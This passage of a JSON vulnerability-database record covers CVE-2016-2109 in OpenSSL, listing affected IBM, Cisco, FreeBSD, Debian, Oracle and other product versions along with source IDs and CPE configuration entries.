0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "10.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.13-41" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network admission control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "10.1-release-p33", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "telepresence conductor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "abyp-0t-0s-4l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "unified attendant console standard", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.115" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.13" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.6)" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "unified communications manager 10.5 su3", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9.4" }, { "model": "abyp-2t-2s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "abyp-4tl-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0(0.400)" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9-34" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "abyp-4ts-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "9.3-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "security proventia network active bypass 0343c3c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cloud manager with openstack interim fix1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "unified ip phones 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11.0(0.98000.225)" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "websphere application server liberty profile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.4" }, { "model": "unity connection", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.98991.13)" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "abyp-10g-2sr-2lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "prime optical for sps", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.4" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50008.3" }, { "model": "10.1-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.12-04" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.1" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.3" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9.2" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server ssl gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.6" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.10000.5)" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.6" }, { "model": "tivoli composite application manager for transactions if37", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "tivoli network manager ip edition fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.94" }, { "model": "prime license manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-42" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.8" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "abyp-4t-0s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "virtual security gateway for microsoft hyper-v vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "connected grid router cgos 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2.3" }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.12-01" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.3-release-p39", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-114" }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.5" }, { "model": "spa232d multi-line dect ata", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.2" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.014-08" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.21" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "globalprotect agent", "scope": "ne", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.1" }, { "model": "dcm series 9900-digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "19.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "10.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1876" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "10.3-release-p2", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9951" }, { "model": "local collector appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.12" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.32" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "connected analytics for collaboration", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2016" }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.1" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.17" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.4-12" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder 10.5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "qradar siem mr2 patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.113" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "900012.0" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7(0)" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.3" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "services analytic platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79009.4(2)" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.17" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "tivoli netcool system service monitors", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2" }, { "model": "unified series ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "video surveillance media server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.9" }, { "model": "unified communications manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.5" }, { "model": "10.2-release-p16", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.2h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3379" }, { "model": "policy suite", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified communications manager session management edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.1" }, { "model": "anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.4.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "9.3-release-p34", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "tivoli provisioning manager for images system edition build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.20290.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.10" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "webex meetings server mr1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.99.2" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "abyp-2t-0s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "asa cx and cisco prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "9.3-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.2" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.13900.9)" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(0.98000.88)" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "87940" }, { "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "db": "CNNVD", "id": "CNNVD-201605-083" }, { "db": "NVD", "id": "CVE-2016-2109" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.1s", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { 